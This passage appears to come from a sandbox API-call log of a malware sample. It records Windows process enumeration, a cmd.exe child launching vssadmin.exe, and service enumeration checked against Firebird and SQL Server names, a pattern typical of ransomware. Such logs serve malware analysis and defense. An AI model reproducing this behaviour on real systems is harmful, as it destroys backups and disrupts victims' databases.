1 [0050.239] lstrlenW (lpString="called.exe") returned 10 [0050.239] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pal_bermuda_xhtml.exe")) returned 1 [0050.240] lstrlenW (lpString="pal_bermuda_xhtml.exe") returned 21 [0050.240] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="analyst.exe")) returned 1 [0050.241] lstrlenW (lpString="analyst.exe") returned 11 [0050.241] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="resolved_encourages_statewide.exe")) returned 1 [0050.242] lstrlenW (lpString="resolved_encourages_statewide.exe") returned 33 [0050.242] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wages.exe")) returned 1 [0050.242] lstrlenW (lpString="wages.exe") returned 9 [0050.242] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rand.exe")) returned 1 [0050.243] lstrlenW (lpString="rand.exe") returned 8 [0050.243] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vacations considered astrology.exe")) returned 1 [0050.333] lstrlenW (lpString="vacations considered astrology.exe") returned 34 [0050.333] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cottage.exe")) returned 1 [0050.334] lstrlenW (lpString="cottage.exe") returned 11 [0050.334] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pairs_spec.exe")) returned 1 [0050.334] lstrlenW (lpString="pairs_spec.exe") returned 14 [0050.334] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arthur cyber bid.exe")) returned 1 [0050.335] lstrlenW (lpString="arthur cyber bid.exe") returned 20 [0050.335] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="observationshairy.exe")) returned 1 [0050.336] lstrlenW (lpString="observationshairy.exe") returned 21 [0050.336] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="portland-workforce-patient.exe")) returned 1 [0050.336] lstrlenW (lpString="portland-workforce-patient.exe") returned 30 [0050.337] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x15c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spectrum.exe")) returned 1 [0050.337] lstrlenW (lpString="spectrum.exe") returned 12 [0050.337] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dies.exe")) returned 1 [0050.338] lstrlenW (lpString="dies.exe") returned 8 [0050.338] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configured.exe")) returned 1 [0050.339] lstrlenW (lpString="configured.exe") returned 14 [0050.339] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rememberkatrina.exe")) returned 1 [0050.339] lstrlenW (lpString="rememberkatrina.exe") returned 19 [0050.339] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x488, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fast.exe")) returned 1 [0050.340] lstrlenW (lpString="fast.exe") returned 8 [0050.340] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="berkeley-challenges-binding.exe")) returned 1 [0050.341] lstrlenW (lpString="berkeley-challenges-binding.exe") returned 31 [0050.341] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="review.exe")) returned 1 [0050.342] lstrlenW (lpString="review.exe") returned 10 [0050.342] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="historybinding.exe")) returned 1 [0050.342] lstrlenW (lpString="historybinding.exe") returned 18 [0050.342] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pk task surge.exe")) returned 1 [0050.343] lstrlenW (lpString="pk task surge.exe") returned 17 [0050.343] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0050.344] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0050.344] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="mobsync.exe")) returned 1 [0050.344] lstrlenW (lpString="mobsync.exe") returned 11 [0050.344] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ivttvf.exe")) returned 1 [0050.345] lstrlenW (lpString="ivttvf.exe") returned 10 [0050.345] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa90, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0050.346] lstrlenW (lpString="cmd.exe") returned 7 [0050.346] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0050.347] lstrlenW (lpString="conhost.exe") returned 11 [0050.347] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xa9c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0050.347] lstrlenW (lpString="vssadmin.exe") returned 12 [0050.347] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0050.348] lstrlenW (lpString="VSSVC.exe") returned 9 [0050.348] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.349] lstrlenW (lpString="svchost.exe") returned 11 [0050.349] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0050.350] CloseHandle (hObject=0x224) returned 1 [0050.350] Sleep (dwMilliseconds=0x1f4) [0051.167] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x5f0020 [0051.167] EnumServicesStatusExW (in: hSCManager=0x5f0020, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 0 [0051.167] GetLastError () returned 0xea [0051.167] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x12c6) returned 0x666b08 [0051.168] EnumServicesStatusExW (in: hSCManager=0x5f0020, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x666b08, cbBufSize=0x12c6, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x666b08, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 1 [0051.168] CloseServiceHandle (hSCObject=0x5f0020) returned 1 [0051.168] lstrlenW (lpString="Appinfo") returned 7 [0051.168] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0051.168] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0051.168] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0051.168] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0051.168] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0051.168] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0051.169] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0051.169] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0051.169] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0051.169] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0051.169] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0051.169] lstrlenW (lpString="AudioSrv") returned 8 [0051.169] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0051.169] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0051.169] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0051.169] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0051.169] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0051.169] lstrlenW (lpString="BFE") returned 3 [0051.169] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0051.169] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0051.169] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0051.169] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0051.169] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0051.169] lstrlenW (lpString="CryptSvc") returned 8 [0051.169] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0051.169] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0051.169] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0051.169] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0051.169] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0051.169] lstrlenW (lpString="CscService") returned 10 [0051.169] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0051.169] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0051.169] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0051.169] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0051.169] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0051.169] lstrlenW (lpString="DcomLaunch") returned 10 [0051.169] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0051.169] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0051.169] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0051.169] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0051.169] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0051.170] lstrlenW (lpString="Dhcp") returned 4 [0051.170] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0051.170] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0051.170] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0051.170] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0051.170] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0051.170] lstrlenW (lpString="Dnscache") returned 8 [0051.170] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0051.170] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0051.170] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0051.170] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0051.170] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0051.170] lstrlenW (lpString="DPS") returned 3 [0051.170] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0051.170] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0051.170] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0051.170] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0051.170] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0051.170] lstrlenW (lpString="eventlog") returned 8 [0051.170] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0051.170] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0051.170] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0051.170] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0051.170] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0051.170] lstrlenW (lpString="EventSystem") returned 11 [0051.170] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0051.170] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0051.170] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0051.170] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0051.170] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0051.170] lstrlenW (lpString="gpsvc") returned 5 [0051.170] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0051.170] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0051.170] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0051.170] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0051.171] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0051.171] lstrlenW (lpString="iphlpsvc") returned 8 [0051.171] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0051.171] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0051.171] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0051.171] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0051.171] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0051.171] lstrlenW (lpString="LanmanServer") returned 12 [0051.171] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0051.171] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0051.171] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0051.171] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0051.171] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0051.171] lstrlenW (lpString="LanmanWorkstation") returned 17 [0051.171] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0051.171] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0051.171] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0051.171] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0051.171] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0051.171] lstrlenW (lpString="lmhosts") returned 7 [0051.171] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0051.171] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0051.171] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0051.171] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0051.171] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0051.171] lstrlenW (lpString="MMCSS") returned 5 [0051.171] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0051.171] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0051.171] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0051.171] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0051.171] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0051.171] lstrlenW (lpString="MpsSvc") returned 6 [0051.171] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0051.171] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0051.171] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0051.171] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0051.172] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0051.172] lstrlenW (lpString="Netman") returned 6 [0051.172] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0051.172] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0051.172] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0051.172] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0051.172] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0051.172] lstrlenW (lpString="netprofm") returned 8 [0051.172] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0051.172] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0051.172] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0051.172] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0051.172] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0051.172] lstrlenW (lpString="NlaSvc") returned 6 [0051.172] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0051.172] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0051.172] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0051.172] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0051.172] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0051.172] lstrlenW (lpString="nsi") returned 3 [0051.172] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0051.172] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0051.172] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0051.172] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0051.172] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0051.172] lstrlenW (lpString="PcaSvc") returned 6 [0051.172] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0051.172] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0051.172] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0051.172] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0051.172] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0051.172] lstrlenW (lpString="PlugPlay") returned 8 [0051.172] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0051.172] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0051.172] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0051.173] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0051.173] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0051.173] lstrlenW (lpString="Power") returned 5 [0051.173] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0051.173] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0051.173] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0051.173] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0051.173] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0051.173] lstrlenW (lpString="ProfSvc") returned 7 [0051.173] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0051.173] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0051.173] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0051.173] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0051.173] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0051.173] lstrlenW (lpString="RpcEptMapper") returned 12 [0051.173] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0051.173] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0051.173] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0051.173] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0051.173] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0051.173] lstrlenW (lpString="RpcSs") returned 5 [0051.173] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0051.173] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0051.173] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0051.173] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0051.173] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0051.173] lstrlenW (lpString="SamSs") returned 5 [0051.173] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0051.173] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0051.173] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0051.173] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0051.173] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0051.173] lstrlenW (lpString="Schedule") returned 8 [0051.173] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0051.174] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0051.174] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0051.174] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0051.174] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0051.174] lstrlenW (lpString="SENS") 